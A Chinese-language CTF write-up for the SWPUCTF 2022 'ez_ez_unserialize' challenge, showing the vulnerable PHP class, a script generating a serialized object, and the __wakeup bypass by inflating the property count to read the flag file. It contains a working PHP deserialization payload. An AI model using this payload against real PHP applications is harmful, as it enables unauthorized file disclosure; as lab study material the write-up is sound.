复健第二天之[SWPUCTF 2022 新生赛]ez_ez_unserialize

打开题目在线环境直接看到源码:

php 复制代码
<?php
class X
{
    public $x = __FILE__;
    function __construct($x)
    {
        $this->x = $x;
    }
    function __wakeup()
    {
        if ($this->x !== __FILE__) {
            $this->x = __FILE__;
        }
    }
    function __destruct()
    {
        highlight_file($this->x);
        //flag is in fllllllag.php
    }
}
if (isset($_REQUEST['x'])) {
    @unserialize($_REQUEST['x']);
} else {
    highlight_file(__FILE__);
}

审计这些php代码,是反序列化,然后根据这个构造pop链:

php 复制代码
<?php

class X
{
    public $x = 'fllllllag.php';
}

$a = new X;
echo serialize($a);

?>

输出 的反序列化数据为:

*O:1:"X":1:{s:1:"x";s:13:"fllllllag.php";}

这里绕过weakup,修改 "X" 后的 1(成员属性数量) 大于 1(实际数量) 即可。

最后再用GET或者POST 方法传参得到flag。

相关推荐
CHICX122913 小时前
2.MySQL 手工注入:从原理到 sqli-labs 实战
web安全·网络安全
Xudde.13 小时前
班级作业笔记报告0x10
笔记·学习·安全·web安全·php
m0_7381207214 小时前
渗透基础知识ctfshow——Web应用安全与防护(第一章)
服务器·前端·javascript·安全·web安全·网络安全
hwscom15 小时前
Chamilo存在命令注入漏洞(CNVD-2026-14971、CVE-2025-50196)
web安全·chamilo
赵侃侃爱分享16 小时前
AI怎么定义网络安全
人工智能·安全·web安全
上海云盾-小余17 小时前
服务器被入侵后如何快速止损?从排查到加固的应急处置全流程
网络·网络协议·tcp/ip·安全·web安全
FreeBuf_19 小时前
14000余台F5 BIG-IP暴露,高危RCE漏洞正遭活跃利用
tcp/ip·安全·web安全
Xudde.19 小时前
班级作业笔记报告0x08
笔记·学习·安全·web安全
Xudde.1 天前
班级作业笔记报告0x09
笔记·学习·安全·web安全·php
CHICX12291 天前
3.SQL 注入之高权限注入(上):从权限原理到跨库攻击,吃透 root 权限注入的危害与防御
web安全·网络安全